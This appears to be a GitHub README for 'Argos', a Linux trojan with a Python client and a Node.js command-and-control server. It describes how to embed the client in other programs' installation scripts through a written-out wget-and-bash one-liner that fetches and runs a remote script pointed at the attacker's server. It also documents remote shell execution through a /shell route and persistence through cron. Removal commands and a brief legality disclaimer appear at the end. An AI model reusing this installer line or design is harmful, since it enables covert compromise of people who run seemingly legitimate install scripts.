Can see everything, beware of its omniscience, kneel before its greatness.
Summary
Presentation
Main goal
This program work on Linux distrubtion.
The main goal of this project is to show how frighteningly easy it is to create a program that can access to another machine. This project is a trojan that, when used in an installation script, can easily be installed and gain access to the whole system.
How it works
There is 2 main parts to this project:
- The online server
- The client
Client side
Get to the client part
cd client/
The client side program is made using python3 and can easily be called in the installation script of another program by using a simple curl command.
The client side is using socket io to connect with the server through web sockets. In case the server is not running, the program will try every 3 seconds to connect to the server until it's connected.
Once connected, the client script is waiting for instructions from the server. The instruction it can get are mostly commands. In order to run the commands, it's using a child process that is running a shell, writing in it's stdin using the file descriptor obtained through the pty.spawn command.
Once the child process is done running a command, it send a ALRM signal to its ppid so we can get the output of the command.
Server side
Get to the server part:
cd online_server
Front:
cd frontend
Backend:
cd server
The server is made in Node js. The backend is composed of 2 server :
The express JS server is meant to received the requests from the frontend server. Here are the routes of that server.
| Route | Protected using JWT |
|---|---|
| /login | NO |
| /services/:id | YES |
| /services/:id/shell | YES |
The socket server accept sockets and stock them in a global variable so the connexion can be used later on. The sockets are listenning to events and so we are using that so in case of deconnexion with a client, the client will automaticly be remove from the list.
The /shell endpoint use the socket io server sending a command to the client and waiting for a response to send back the information to the frontend.
FrontEnd endpoints:
| Endpoint | Protected |
|---|---|
| /login | NO |
| /clients | YES |
| /services/:id | YES |
| /services/:id/shell | YES |
Installation
In order to use the project, you need to have a script that people will run.
In this very script, you juste have to call this command (remember to replace the 'Adress of the online server' by your server adress) :
wget -q -O - https://raw.githubusercontent.com/Just1truc/Argos/main/client/install_argos > here && chmod 777 here && bash here "Adress of the online server" && rm here
Once this command has been run, everthing should be ready for the client.
Also, to setup the server, it's kinda more complicated. You have to host both the front and the backend.
Removing
This trojan is pretty annoying right? So let's remove it from your computer !
Automatically
crontab -r && kill $(ps -aux | grep /usr/local/src/.service.exwrap.py | grep -v "grep" | awk '{print $2}')
Manually
To do so, you just need to first execute this command to get rid of the cronjob :
crontab -r
Then, you need to cut the access to your computer, so let's kill the script doing that: if you don't have htop, you may have to install it.
htop -F python
Tip: The trojan file is .service.exwrap.py
Then, keep the pid of the command that is using python3 to run and kill it:
kill [pid]
Credits:
 Justin Duc Client side and Backend   |
 Baptiste Leroyer Frontend Developper |
 Léo Dubosclard DevOps Developper |
 Joshua Brionne Frontend Developper |
 Paul Laban Frontend Developper |
 Mathias André Stability responsible |
⚠️ Do not use for illegal purposes
THIS PROJECT IS IN PROGRESS. It's FUNCTIONNAL but it's not as securised as it should be
12 Nov 15, 2022
585 Dec 31, 2022
4 Jun 4, 2022
1 Mar 1, 2021
4 May 13, 2022
5 Oct 9, 2022
1 Apr 19, 2022
4 Jan 21, 2022
8 Oct 31, 2022
2 Jun 13, 2022